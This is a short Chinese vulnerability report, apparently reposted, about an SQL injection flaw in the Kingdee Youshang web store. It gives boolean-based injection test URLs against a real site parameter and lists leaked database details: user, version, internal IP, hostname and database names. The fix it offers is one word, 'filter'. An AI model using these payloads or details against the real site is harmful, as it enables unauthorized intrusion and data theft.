金蝶友商网存在SQL注入 漏洞 ,可以得出相关数据表及记录。 漏洞证明: 输入1=1得出: http://store.youshang.com/show.php?id=81738%20and%201=1 输入1=2得出: http://store.youshang.com/show.php?id=81738%20and%201=2 数据库 相关信息: Current User: youshangportal@192.168.30.114 Sql Version: 5.0.77-log Current DB: youshangportal System User: youshangportal@192.168.30.114 Host Name: REDHAT64BI Installation dir: /usr/local/ mysql / DB User: 'youshangportal'@'%' Data Bases: information_schema test youshangportal ysproject 相关表明: 修复方案: 一个词[过滤] 作者 小仙仙
查看更多关于金蝶友商网存在SQL注入漏洞及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12213